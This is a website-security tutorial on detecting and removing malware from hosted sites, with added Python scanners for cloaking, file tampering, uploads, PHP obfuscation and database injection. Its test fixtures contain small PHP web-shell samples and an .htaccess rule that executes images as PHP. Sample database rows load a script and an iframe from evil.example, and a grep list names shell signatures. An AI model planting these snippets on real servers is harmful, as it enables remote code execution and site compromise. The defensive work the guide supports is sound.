
How to scan a website for viruses: tips from a professional admin

Vadim Korchinskii
Website admin since 2012

I have been administering websites since 2012. I specialize in security: I delete malicious scripts and eliminate vulnerabilities. I have looked for viruses and deleted them both on small blogs and on large Internet portals. Today I am going to share the tools I use to scan a website for viruses and delete them.

This article is not for beginners: you will need basic knowledge of HTML, PHP and JS, and the ability to work in the console (shell).

What is a virus? How does it infect a website?

A "virus" here is any malicious piece of code planted on the site. It changes the appearance of the website, inserts ads, redirects visitors to another site, gives the attacker a way back in (a web shell or backdoor), or uses the hosting account's resources for cryptomining and other computation.

A website is probably infected if:

  1. Pages have been filled with content the owner never added.
  2. The website has become slow.
  3. Visitors are redirected to another resource when they open it.
  4. Search traffic has dropped.
  5. New folders or files have appeared on the hosting account.

Malware gets onto websites through vulnerable code and extensions, through incorrect hosting settings, through password attacks on the admin panel or FTP, and through an infected hosting server or an infected computer of the administrator (stolen saved credentials).

Once a site is infected, the owner's reputation, the search traffic and the website's revenue are at risk. To cure a website you need to make sure it is actually infected, then find and delete the malicious code, and then close the way the attacker got in so it does not happen again. I describe each stage below.

Check whether your website is infected

If you suspect that there is malware on your website but are not quite sure, confirm the infection first. I check websites with online scanners and also by opening them in several browsers and looking at them through search engines.

Website virus check through online scanners

Online scanners find malicious code quickly, but I never rely on them alone: not every virus can be found automatically. Here are a few services:

Dr.Web sometimes misses malicious scripts: it is primarily a desktop antivirus rather than a website scanner.

Behavior in different browsers and on different devices

One of the signs of infection is redirection: when users open your website, they land on a different resource. An infected website may open normally on a desktop while mobile users are redirected to a phishing page or a paid mobile subscription page, or vice versa, because the malware decides what to do based on the User-Agent, referrer or IP address of the request.

That is why you need to check how your website behaves in different browsers, operating systems and on mobile devices, and ideally also with a search engine's User-Agent, which cloaking malware treats differently again.

Search view

Search engines scan websites for malware as they crawl them. In Google's results an infected site is greyed out and carries a warning caption such as "This site may harm your computer"; if the site is registered in Google Search Console, the detected problems are also listed there under Security issues.

To check your website, type its address into the Google search bar. If you see a warning, the website has been flagged as infected. Look at the results and at the infection chain the warning describes.

This method is not universal. Search engines do not find malicious code immediately. Moreover, malware can check where a request comes from and hide from crawlers (cloaking): if the User-Agent or IP address belongs to a search engine, the injected scripts are simply not served, so the search engine never sees what is wrong.
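Here is an added example (not code from the article) that automates the comparison described in the two sections above: it fetches one URL with a desktop, a mobile and a Googlebot User-Agent, without following redirects, and reports which of the status code, Location header, external script sources, iframe sources or meta refresh differ between the variants. The User-Agent strings and the regexes are my assumptions; the live check needs network access, while compare_variants works on any captured responses.

```python
"""Fetch one URL under several User-Agents and diff what comes back.

Added example, not part of the original article. It assumes the server
answers a redirect with a 3xx status and a Location header; a redirect
done in JavaScript shows up only as an extra <script> (or a meta refresh)
in the body, which the report lists as well.
"""
import re
import urllib.error
import urllib.request

# Representative agents (assumed): cloaking malware usually serves clean
# content to the crawler and the payload to real visitors.
USER_AGENTS = {
    "desktop": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0 Safari/537.36",
    "mobile": "Mozilla/5.0 (Linux; Android 13; Pixel 7) AppleWebKit/537.36 Chrome/120.0 Mobile Safari/537.36",
    "googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
}

SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']([^"\']+)', re.I)
IFRAME_SRC = re.compile(r'<iframe[^>]+src=["\']([^"\']+)', re.I)
META_REFRESH = re.compile(r'<meta[^>]+http-equiv=["\']refresh["\'][^>]*>', re.I)


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following redirects so the Location header stays visible."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(url, user_agent, timeout=15):
    """Return (status, location_or_None, body_text). Needs network access."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    opener = urllib.request.build_opener(NoRedirect())
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location"), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:  # 3xx/4xx/5xx land here because redirects are not followed
        return e.code, e.headers.get("Location"), e.read().decode("utf-8", "replace")


def summarize(status, location, body):
    """Reduce a response to the pieces a redirect or an injection would change."""
    return {
        "status": status,
        "location": location,
        "scripts": sorted(set(SCRIPT_SRC.findall(body))),
        "iframes": sorted(set(IFRAME_SRC.findall(body))),
        "meta_refresh": bool(META_REFRESH.search(body)),
    }


def compare_variants(responses):
    """responses: {variant_name: (status, location, body)}.

    Returns {field: {variant: value}} for every field whose value is not the
    same across all variants. An empty dict means every agent got the same page.
    """
    summaries = {name: summarize(*resp) for name, resp in responses.items()}
    diffs = {}
    for field in ("status", "location", "scripts", "iframes", "meta_refresh"):
        values = {name: s[field] for name, s in summaries.items()}
        if len({repr(v) for v in values.values()}) > 1:
            diffs[field] = values
    return diffs


def check_site(url):
    """Live check: fetch url once per agent and return the differences."""
    return compare_variants({name: fetch(url, ua) for name, ua in USER_AGENTS.items()})


if __name__ == "__main__":
    import sys

    for field, values in check_site(sys.argv[1]).items():
        print(field)
        for name, value in values.items():
            print(f"  {name:<10} {value}")
```

Run it as `python3 check_cloak.py https://mysite.com/` and repeat for a few deep pages, not just the front page: doorway and redirect code is often attached to individual posts. An empty report does not prove the site is clean (the malware may key on the referrer or the visitor's IP range), but any difference between the Googlebot variant and a browser variant is a strong sign of cloaking.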

The number of pages in search results

Another kind of infection is doorways: pages the attacker adds to your site to rank for their own keywords, filling the search index with their content.

To check a website for doorways, use the search engine again. Enter the query site:mysite.com and look through all the results. Pages that do not match the subject of your website are doorways.

Find and delete malicious code

Once the infection is certain, the malicious code has to be found and deleted. Finding it is the hard part. I look through files manually and also use the console.

Analyze HTML and JS scripts

Malicious scripts are often injected into the website's HTML (press Ctrl+U in the browser to view the page source). Check it for JavaScript you did not add, iframe inserts and spam links, and delete them if you find any. The injected markup is produced by some file or database record on the server, so find and clean that source as well, otherwise the insert reappears on the next page load.

Check every JS file loaded during the page load for foreign inserts. Usually they are either at the very beginning or at the very end of the script. Delete all such inserts.

Sometimes the code is hard to read or is obfuscated. In that case, compare the script's contents with the original file from the CMS, plugin or template archive of the same version.

Indeed, a malicious script is not always a separately connected file; oftentimes one of the existing files is modified. If the code is obfuscated, you won't be able to understand it. In that case, you should find out in what file it is located.

If it is part of a CMS, you need to check the original contents of such a file by extracting the archive with the CMS of the same version and comparing this file's contents.

If a file is self-written, i.e. it doesn't belong to a CMS component, you'd better contact the developers. They probably know what they wrote themselves and what might have been added by malware. In that case, the original content can be restored from a backup.

Rostislav Vorobyev, Tech Support ISPsystem
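To make the comparison Rostislav describes systematic, here is an added example (not code from the article or from ISPsystem) that hashes every file in the live site tree and in a pristine unpacked archive of the same CMS version and reports files that were modified, added or removed. The sample tree it builds, the WordPress-style file names and the wp-content/uploads exclusion are constructed for the demonstration; pass whatever directories legitimately differ on your own site.

```python
"""Compare a live site tree against a pristine copy of the same CMS version.

Added example, not from the original article. It assumes you have unpacked
the original CMS/plugin/theme archive (same version) into a separate
directory; files that differ from it or exist only on the live site are
where modified or dropped-in scripts will be.
"""
import hashlib
import os


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root):
    """Map relative path -> sha256 for every regular file under root (symlinks skipped)."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            result[os.path.relpath(full, root)] = sha256_of(full)
    return result


def compare_trees(live_root, pristine_root, ignore_prefixes=()):
    """Return {"modified": [...], "added": [...], "missing": [...]} (sorted relative paths).

    ignore_prefixes: relative directories such as "wp-content/uploads" that are
    expected to differ and should not be reported.
    """
    live = hash_tree(live_root)
    pristine = hash_tree(pristine_root)

    def ignored(rel):
        return any(rel == p or rel.startswith(p.rstrip("/") + "/") for p in ignore_prefixes)

    report = {"modified": [], "added": [], "missing": []}
    for rel, digest in sorted(live.items()):
        if ignored(rel):
            continue
        if rel not in pristine:
            report["added"].append(rel)
        elif pristine[rel] != digest:
            report["modified"].append(rel)
    for rel in sorted(pristine):
        if rel not in live and not ignored(rel):
            report["missing"].append(rel)
    return report


def build_sample(base):
    """Constructed sample: a pristine tree and a live copy with one modified and one added file."""
    pristine, live = os.path.join(base, "pristine"), os.path.join(base, "live")
    for root in (pristine, live):
        os.makedirs(os.path.join(root, "wp-includes"))
        with open(os.path.join(root, "wp-includes", "load.php"), "w") as f:
            f.write("<?php\n// original loader\n")
    with open(os.path.join(live, "wp-includes", "load.php"), "a") as f:  # appended backdoor
        f.write("eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydjJ10pKSBldmFsKCRfUE9TVFsnYyddKTs='));\n")
    with open(os.path.join(live, "wp-includes", "class-wp-cache.php"), "w") as f:  # dropped-in file
        f.write("<?php // not part of the CMS\n")
    os.makedirs(os.path.join(live, "wp-content", "uploads"))
    with open(os.path.join(live, "wp-content", "uploads", "photo.jpg"), "wb") as f:
        f.write(b"\xff\xd8\xff")
    return live, pristine


if __name__ == "__main__":
    import sys
    import tempfile

    if len(sys.argv) >= 3:
        live, pristine, ignores = sys.argv[1], sys.argv[2], sys.argv[3:]
    else:  # no arguments: run on the constructed sample
        live, pristine = build_sample(tempfile.mkdtemp())
        ignores = ["wp-content/uploads"]
    report = compare_trees(live, pristine, ignore_prefixes=ignores)
    for kind in ("modified", "added", "missing"):
        for rel in report[kind]:
            print(f"{kind:<9} {rel}")
```

Usage: `python3 cmscompare.py /var/www/site /tmp/wordpress-clean wp-content/uploads`. Everything under "modified" is either a deliberate local change or an infection, so the list should be short and explainable; "added" files inside core directories such as wp-includes deserve the closest look, and "missing" files usually mean the attacker cleaned up after an exploit.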

Check the file and folder modification date

If you know when the website was hacked, the malicious code can be found by checking all the files modified since then.

For instance, if the website was hacked a few days ago, then to list all the PHP scripts modified in the last 7 days run this command from the site root:

find . -name '*.ph*' -mtime -7

Then analyze the PHP scripts found for malicious inserts. Bear in mind that attackers often reset a file's modification time with touch so that it matches its neighbours; the inode change time cannot be faked that way, so repeat the command with -ctime in place of -mtime and compare the two lists.

This actually helps to shrink the list of suspected PHP files that may contain malware. However, malware is not always located in PHP files. By slightly modifying an .htaccess file, you can create a .jpg file, put PHP code inside it, and the web server will execute it like normal PHP, but it will look like a picture (implementation example).

Rostislav Vorobyev

Analyze directories upload/backup/log/image/tmp

The directories upload/backup/log/image/tmp are potentially dangerous because they are usually writable by the web server. In most cases that is where hackers put the shell scripts used to infect the website's files and database. Such directories should be checked for malicious PHP scripts.

For example, the upload directory can be checked with this command, run from the site root:

find ./upload/ -type f -name '*.ph*'

It lists all PHP files in the upload directory; there should be none.

After analysis, move the infected files out of the web root into a quarantine directory rather than deleting them outright, so they can still be examined. If you do want to delete them, do it manually or with this command:

find ./upload/ -name '*.ph*' -exec rm '{}' \;
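An added example (not from the article) that does this check in one pass over an upload-style directory and also covers the case Rostislav mentions above, a picture that is really PHP. It flags files with script extensions, PHP open tags inside files of any other extension, and .htaccess or .user.ini lines that attach a handler or an auto_prepend_file (the mechanism that makes a .jpg execute). The extension list, the planted sample files and the directory layout are my assumptions.

```python
"""Scan an upload-style directory for code that should not be there.

Added example, not from the original article. Three checks: files with a
script extension, PHP open tags inside files that claim to be something
else (images, text), and .htaccess / .user.ini lines that map an extension
to a handler or prepend a file, which is how a ".jpg" gets executed as PHP.
"""
import os
import re

SCRIPT_EXT = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar",
              ".phps", ".pht", ".cgi", ".pl", ".sh"}
# <?php, <?= and the short tag "<? " (short_open_tag hosts); <?xml does not match.
PHP_TAG = re.compile(rb"<\?php\b|<\?=|<\?\s")
# Any of these inside an upload directory is worth reading, whoever put it there.
HTACCESS_ABUSE = re.compile(r"^\s*(AddHandler|AddType|SetHandler|php_value|php_flag)\b", re.I)
USERINI_ABUSE = re.compile(r"^\s*auto_(prepend|append)_file\s*=", re.I)


def scan_upload_dir(root, read_limit=1_000_000):
    """Return {"script_ext": [...], "php_in_other": [...], "config": [(path, line), ...]}."""
    hits = {"script_ext": [], "php_in_other": [], "config": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name in (".htaccess", ".user.ini"):
                rx = HTACCESS_ABUSE if name == ".htaccess" else USERINI_ABUSE
                with open(path, "r", errors="replace") as f:
                    for line in f:
                        if rx.match(line):
                            hits["config"].append((rel, line.strip()))
                continue
            if os.path.splitext(name)[1].lower() in SCRIPT_EXT:
                hits["script_ext"].append(rel)
                continue
            with open(path, "rb") as f:  # only the first read_limit bytes are inspected
                data = f.read(read_limit)
            if PHP_TAG.search(data):
                hits["php_in_other"].append(rel)
    for key in hits:
        hits[key].sort()
    return hits


def build_sample(base):
    """Constructed sample upload tree: one real image plus four planted items."""
    os.makedirs(os.path.join(base, "2024", "05"))
    files = {
        "2024/05/photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF",
        "2024/05/thumb.jpg": b"GIF89a<?php system($_GET['c']); ?>",
        "2024/wso.phtml": b"<?php eval($_POST['x']); ?>",
        "2024/.htaccess": b"AddHandler application/x-httpd-php .jpg\n",
        ".user.ini": b"auto_prepend_file=/tmp/x.gif\n",
    }
    for rel, data in files.items():
        with open(os.path.join(base, rel), "wb") as f:
            f.write(data)
    return base


if __name__ == "__main__":
    import sys
    import tempfile

    root = sys.argv[1] if len(sys.argv) > 1 else build_sample(tempfile.mkdtemp())
    for key, items in scan_upload_dir(root).items():
        for item in items:
            print(f"{key:<13} {item}")
```

Run it as `python3 scan_uploads.py /var/www/site/upload`; without an argument it runs on the constructed sample. The .user.ini check matters on PHP-FPM hosts, where .htaccess php_* directives are ignored but a .user.ini with auto_prepend_file in a writable directory is honoured for every request under it.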

Find files and folders with unconventional names

Open the website directory. Look for files and folders with unusual names or suspicious contents and delete them.

It’s important to understand what unconventional means. If you are sure that a directory or a file was not created by you and the name doesn’t look like one that could be made by a CMS or a plugin, you can delete it. But you’d better make a backup of these files, delete them and check whether your website keeps functioning normally. You should also check backups a couple of days prior to the infection. If it is malware, your backup won’t contain these files/directories.

Rostislav Vorobyev

Find directories with many PHP or HTML files

Check all hosting directories for an unusual number of PHP or HTML files in one place, which is typical of doorway pages and spam. This command counts the PHP files under each top-level directory:

find ./ -mindepth 2 -type f -name '*.php' | cut -d/ -f2 | sort | uniq -c | sort -nr

After you run it, the list of directories with the number of PHP files in each appears on the screen, largest first. Repeat with '*.html' for HTML pages. If a directory contains a suspiciously large number of files, check them.

Find virus scripts by their content

You can quickly check a website for virus scripts with this command:

find ./ -type f -name '*.ph*' -exec grep -i -H "wso shell\|Backdoor\|Shell\|base64_decode\|str_rot13\|gzuncompress\|gzinflate\|strrev\|killall\|navigator.userAgent.match\|mysql_safe\|UdpFlood\|40,101,115,110,98,114,105,110\|msg=@gzinflate\|sql2_safe\|NlOThmMjgyODM0NjkyODdiYT\|6POkiojiO7iY3ns1rn8\|var vst = String.fromCharCode\|c999sh\|request12.php\|auth_pass\|shell_exec\|FilesMan\|passthru\|system\|passwd\|mkdir\|chmod\|md5=\|e2aa4e\|file_get_contents\|eval\|stripslashes\|fsockopen\|pfsockopen\|base64_files" {} \;

Alternatively, use grep without find:

grep -R -i -H -E "wso shell|Backdoor|Shell|base64_decode|str_rot13|gzuncompress|gzinflate|strrev|killall|navigator.userAgent.match|mysql_safe|UdpFlood|40,101,115,110,98,114,105,110|msg=@gzinflate|sql2_safe|NlOThmMjgyODM0NjkyODdiYT|6POkiojiO7iY3ns1rn8|var vst = String.fromCharCode|c999sh|request12.php|auth_pass|shell_exec|FilesMan|passthru|system|passwd|mkdir|chmod|md5=|e2aa4e|file_get_contents|eval|stripslashes|fsockopen|pfsockopen|base64_files" ./

Both commands search the files of the current directory recursively, starting from the directory they are run in.

There will be many matches, and most of the files will not be malware, because CMS modules use these functions too: generic words such as system, mkdir, chmod, passwd and eval hit almost every CMS. The specific markers (FilesMan, c999sh, wso shell, the base64 and numeric fragments) are much rarer in legitimate code, so start with those, and look for combinations such as eval(base64_decode(...)) or a function fed straight from $_POST or $_GET.

Anyway, analyze the PHP scripts found for malicious inserts. Before you delete a file, make sure to check its contents.
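An added example (not from the article) that turns the flat word list above into a scored check. It weights the rare combinations heavily (eval of a decoder, a request parameter passed straight to eval or system, known shell markers, long opaque string literals) and the common single functions lightly, so a core file that merely calls base64_decode() scores below the threshold while a one-line web shell scores above it. The indicator list, the weights, the threshold of 8 and the sample files are my assumptions; tune them on your own code base.

```python
"""Score PHP files by suspicious constructs instead of a flat grep.

Added example, not from the original article. A single hit on eval() or
base64_decode() is common in legitimate CMS code; eval(<decoder>(...)),
request data going straight into eval/system, and long opaque literals are
far rarer, so those carry most of the weight. Weights are assumptions.
"""
import os
import re

# (name, regex, weight); names are only for the report.
INDICATORS = [
    ("eval_of_decoder", re.compile(rb"\beval\s*\(\s*(?:@?\w+\s*\(\s*)*(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I), 8),
    ("eval_of_request", re.compile(rb"\b(eval|assert)\s*\(\s*@?\$_(POST|GET|REQUEST|COOKIE)\b", re.I), 10),
    ("exec_of_request", re.compile(rb"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*@?\$_(POST|GET|REQUEST|COOKIE)\b", re.I), 10),
    ("call_from_request", re.compile(rb"\$_(POST|GET|REQUEST|COOKIE)\[[^\]]+\]\s*\(", re.I), 8),
    # preg_replace with the /e modifier (code execution on PHP < 7); heuristic match on a space-free pattern
    ("preg_replace_e", re.compile(rb"preg_replace\s*\(\s*['\"]\S+?[^a-zA-Z0-9\s][a-zA-Z]*e[a-zA-Z]*['\"]"), 6),
    ("long_base64_blob", re.compile(rb"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"), 5),
    ("hex_or_chr_string", re.compile(rb"(\\x[0-9a-f]{2}){10,}|(chr\s*\(\s*\d+\s*\)\s*\.\s*){6,}", re.I), 5),
    ("known_shell_marker", re.compile(rb"FilesMan|c99sh|c999sh|wso\s*shell|r57shell|b374k", re.I), 10),
    ("decoder_func", re.compile(rb"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I), 1),
    ("exec_func", re.compile(rb"\b(system|passthru|shell_exec|exec|popen|proc_open|eval)\s*\(", re.I), 1),
]

SCRIPT_EXT = (".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".inc")


def score_source(data):
    """Return (score, [indicator names]) for one file's bytes."""
    score, names = 0, []
    for name, rx, weight in INDICATORS:
        if rx.search(data):
            score += weight
            names.append(name)
    return score, names


def scan_tree(root, threshold=8):
    """Return [(relpath, score, names)] for script files scoring >= threshold, highest first."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCRIPT_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                data = f.read()
            score, names = score_source(data)
            if score >= threshold:
                findings.append((os.path.relpath(path, root), score, names))
    findings.sort(key=lambda t: -t[1])
    return findings


# Constructed samples: two planted files and one benign CMS-style file.
SAMPLES = {
    "wp-content/cache.php": b"<?php eval(gzinflate(base64_decode('aWYoaXNzZXQoJF9QT1NUWydjJ10pKXtldmFsKCRfUE9TVFsnYyddKTt9')));",
    "wp-content/uploads/wp-conf.php": b"<?php if(isset($_POST['c'])){ system($_POST['c']); }",
    "wp-includes/class-http.php": b"<?php $data = base64_decode($encoded); $json = file_get_contents($path);",
}


def build_sample(base):
    """Write SAMPLES under base and return base."""
    for rel, data in SAMPLES.items():
        os.makedirs(os.path.dirname(os.path.join(base, rel)), exist_ok=True)
        with open(os.path.join(base, rel), "wb") as f:
            f.write(data)
    return base


if __name__ == "__main__":
    import sys
    import tempfile

    root = sys.argv[1] if len(sys.argv) > 1 else build_sample(tempfile.mkdtemp())
    for rel, score, names in scan_tree(root):
        print(f"{score:>3}  {rel}  ({', '.join(names)})")
```

Run as `python3 phpscore.py /var/www/site` and read the top of the list first; files scoring 1 or 2 are almost always legitimate, while anything with eval_of_decoder, eval_of_request or exec_of_request is a web shell until proven otherwise. New obfuscations (goto-based, string concatenation of function names) will slip past any fixed list, which is why the manual review in the text remains necessary.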

Check the database

Oftentimes, when hacking or infecting a website, attackers also add malicious code to the database, for example to posts or to site options, from where the CMS prints it into every page. To check the database quickly, open phpMyAdmin and search for these fragments:

<script , <? , <?php , <iframe

If you find a malicious fragment, delete it. Search all tables, not just the content table: in WordPress, for instance, injected code often sits in wp_options (widget and theme settings) as well as in wp_posts. Make a database backup before you edit any rows.

Yes, that's right. But it will be difficult for a regular user to analyze the contents of a database: he/she will need basic SQL skills, knowledge of the syntax, and an understanding of which table to look in for the content. Besides, malware may be implicit, obfuscated, encrypted, etc.

Rostislav Vorobyev
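An added example (not from the article) that answers the "which table" problem Rostislav raises: it searches every text column of every table for the fragments above, so you do not need to know in advance where the CMS keeps its content. It runs against SQLite so that it is self-contained; on MySQL the table and column enumeration comes from information_schema.columns, the rowid fallback has to be replaced with the table's primary key, and the LIKE conditions stay the same. The marker list and the WordPress-style sample tables are my assumptions.

```python
"""Search every text column of every table for injected markup.

Added example, not from the original article. Uses SQLite for a
self-contained run; the approach (enumerate text columns, LIKE each
marker, escape the wildcard characters) is the same on MySQL.
"""
import sqlite3

# Fragments to look for: the article's list plus common JavaScript-only forms.
MARKERS = ["<script", "<iframe", "<?php", "<?", "eval(", "document.write(",
           "String.fromCharCode(", "base64,"]


def text_columns(conn):
    """Yield (table, column) for every column whose declared type can hold text."""
    tables = [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        for _cid, name, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            t = ctype.upper()
            if "TEXT" in t or "CHAR" in t or "CLOB" in t or t == "":
                yield table, name


def like_pattern(marker):
    """Escape %, _ and \\ so the marker is matched literally inside LIKE."""
    escaped = marker.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return "%" + escaped + "%"


def scan_db(conn, markers=MARKERS, id_column="ID"):
    """Return sorted [(table, column, row_key, marker)] for every cell containing a marker.

    row_key is the value of id_column when the table has it, else the SQLite rowid.
    """
    hits = []
    for table, column in text_columns(conn):
        cols = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')]
        key = f'"{id_column}"' if id_column in cols else "rowid"
        sql = f'SELECT {key} FROM "{table}" WHERE "{column}" LIKE ? ESCAPE ' + "'\\'"
        for marker in markers:
            for (row_key,) in conn.execute(sql, (like_pattern(marker),)):
                hits.append((table, column, row_key, marker))
    return sorted(hits, key=lambda h: (h[0], h[1], str(h[2]), h[3]))


def sample_db():
    """Constructed in-memory database with one clean and one injected row per table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT)")
    conn.execute("CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT, option_value LONGTEXT)")
    conn.executemany("INSERT INTO wp_posts VALUES (?,?,?)", [
        (1, "Hello", "<p>Welcome</p>"),
        (2, "Pricing", "<p>Plans</p><SCRIPT src='//evil.example/x.js'></SCRIPT>"),
    ])
    conn.executemany("INSERT INTO wp_options VALUES (?,?,?)", [
        (1, "siteurl", "https://site.example"),
        (2, "widget_text", "<iframe src='http://evil.example' width=0 height=0></iframe>"),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    import sys

    conn = sqlite3.connect(sys.argv[1]) if len(sys.argv) > 1 else sample_db()
    for table, column, row_key, marker in scan_db(conn):
        print(f"{table}.{column} row {row_key}: contains {marker!r}")
```

SQLite's LIKE is case-insensitive for ASCII, which is why the upper-case `<SCRIPT` in the sample is still found; on MySQL that depends on the column collation (the default *_ci collations behave the same). Expect legitimate hits too, e.g. an embedded YouTube iframe in a post, so review each row before deleting anything.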

Use online services

To check a website automatically for viruses, shell scripts, redirects and doorways, you can use scanners:

In my experience automatic scanners find up to about 90% of the malicious scripts on an infected website; the rest has to be found manually with the console commands described above.

An antivirus can find most of the malicious files, but it doesn't know all of them. New scripts appear, and they are obfuscated differently in order to get around antivirus software, etc.

Rostislav Vorobyev

Protect a website from being hacked

After you have deleted all shell scripts and malicious inserts, you have to protect the website against being hacked again. No measure makes a site invulnerable, but the steps below close the entry points used in most infections.

Protect the admin panel by IP

A common way in is the admin panel: the attacker brute-forces or steals the password. To prevent this, restrict access to the panel by IP address, i.e. allow logging in only from certain addresses.

In the admin panel directory (administrator, bitrix/admin, wp-admin, ...) add an .htaccess file with this content:

Order Deny,Allow
Deny from all
Allow from 1.1.1.1

where 1.1.1.1 stands for the IP address allowed to open the panel (a placeholder; use your own). This is Apache 2.2 syntax: on Apache 2.4 it works only if mod_access_compat is loaded, otherwise use the Require ip directive.

If your IP address is not static, you can allow a range instead. For instance, if your provider always assigns you addresses from 203.0.113.0/24, add Allow from 203.0.113. to the .htaccess file (Apache also accepts CIDR notation such as 203.0.113.0/24). The wider the range, the weaker this protection, so combine it with the HTTP authorization described next. Note that a range like 192.168.x.x is private address space and is never what your provider shows to the outside world; use the public address you see from the site's server logs.

Protect the admin panel by HTTP authorization

Set an additional login and password for the website admin panel. To do this, add .htaccess and .htpasswd files to the admin panel directory (administrator, bitrix/admin, wp-admin, ...).

Add this to the .htaccess file:

ErrorDocument 401 "Unauthorized Access"
ErrorDocument 403 "Forbidden"
AuthName "Authorized Only"
AuthType Basic
AuthUserFile /home/site.com/admin/.htpasswd
Require valid-user
<FilesMatch "\.(css|js|png|gif|jpg)$">
    Allow from all
    Satisfy Any
</FilesMatch>

where /home/site.com/admin/.htpasswd is the full path to the .htpasswd file on your server. Apache refuses to serve files whose name starts with .ht, but it is still better to keep the password file outside the web root. The FilesMatch block lets the browser load the panel's stylesheets, scripts and images without a password prompt.

In the .htpasswd file add the extra login and the password hash that will be used to enter the panel. Generate it with the htpasswd utility that ships with Apache (its -B option produces bcrypt hashes) or with an online htpasswd generator such as Htpasswd Generator: enter the new login and password, click Create .htpasswd file, and paste the result into the .htpasswd file. Do not reuse the CMS admin password for it.
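The two fragments above use Apache 2.2 access-control syntax. The same protection written for Apache 2.4, combining the IP restriction and the password into one rule set, as an added example that is not part of the article (the IP addresses, the path to the password file and the WordPress-specific exemption are assumptions; adjust them to your site):

```apache
# Added example, Apache 2.4 syntax. Put it in the admin directory's .htaccess,
# or better in the virtual host configuration inside a <Directory> block with
# AllowOverride None, so that an attacker with write access to the web root
# cannot simply delete the rule.
# 203.0.113.10, 198.51.100.0/24 and the AuthUserFile path are placeholders.

AuthType Basic
AuthName "Authorized Only"
# Keep the password file outside the web root.
AuthUserFile /var/www/site.example/.htpasswd

# Both conditions must hold: an allowed source address AND a valid password.
<RequireAll>
    Require ip 203.0.113.10 198.51.100.0/24
    Require valid-user
</RequireAll>

# Static assets the admin pages load are public anyway; serve them without
# the credentials prompt.
<FilesMatch "\.(css|js|png|gif|jpe?g|svg|woff2?)$">
    Require all granted
</FilesMatch>

# WordPress only: the public front end calls wp-admin/admin-ajax.php, so
# exempt it; protect wp-login.php (which lives outside wp-admin) the same way.
<Files "admin-ajax.php">
    Require all granted
</Files>
```

Create the password file with `htpasswd -B -c /var/www/site.example/.htpasswd paneluser` (bcrypt; drop -c when adding further users to an existing file) and check the result with a browser from an address outside the allowed range: you should get a 403, not a password prompt, because the IP rule is evaluated first.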

Website catalogs protection

By default all the files and directories of a website are writable by the user the site runs as, and on most shared hosting PHP runs as that very user. This is dangerous: a hacker who finds a vulnerability can upload and run a shell script, or overwrite a file, in any directory.

To secure the website you need to "harden" it: set permissions 444 for all CMS system files, plugins and templates that do not need write access for normal operation, and 555 for directories.

I would set 755 or 655 for CMS system files, plugins, and templates, and 644 for directories. The best option is to refer to the documentation of the particular CMS or plugin to find out the recommended permissions for it to work properly. Incorrect permissions may break a website.

Rostislav Vorobyev

The point is to prohibit writing to the whole website directory tree and to prohibit modifying any CMS files that do not need to change while the website is running. Reading files and traversing directories remains allowed with these permissions; only writing is blocked. Note that this helps only against code that runs as a different user: where PHP runs as the file owner, a web shell can simply chmod the files back, which is why chmod is disabled in php.ini below. So that your website keeps running properly, do this:

  1. Set permissions 444 for all files.
  2. Set permissions 555 for all directories.
  3. Set permissions 644 for files that must be writable.
  4. Set permissions 755 for directories that must be writable (uploads, cache, logs).

These permissions suit both websites where the CMS, plugins and templates have been heavily modified and cannot be updated to the latest versions, and simple websites where the CMS, templates and plugins are rarely updated.

If you need to update a plugin or a template, recursively change the permissions to 644 and 755, update everything, and then set 444 and 555 back again.

For the convenience of regular users, two PHP scripts are created:
mysite.com/protect.php changes all permissions for files and folders to 444 and 555,
mysite.com/unprotected.php sets permissions 644 and 755.
If you keep such scripts, they must themselves be protected by the IP restriction and HTTP authorization above, or better run from the shell rather than through the web server: an unprotected.php that anyone can open undoes the hardening for the attacker.

You also need to add disable_functions = chmod to php.ini (append it, comma-separated, to any functions already listed there; system, exec and shell_exec belong on that list too if the site does not need them) so that permissions cannot be changed programmatically from a web shell. Check afterwards that the CMS's own update routines, which may call chmod(), still work.
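The four steps above as one script, an added example that is not the article's protect.php/unprotected.php: it walks the site tree, applies 444/555 everywhere except the subtrees you list as writable (which get 644/755), and can undo the change before an update. The sample tree, the WordPress-style paths and the wp-content/uploads exception are assumptions; run it from the shell as the file owner, not through the web server, for the reason given above.

```python
"""Apply the read-only permission layout to a site tree, and undo it.

Added example, not from the original article. Directories listed in
`writable` (relative to root) keep 755/644 so the CMS can still write
uploads, caches and logs; everything else becomes 444/555. Symlinks are
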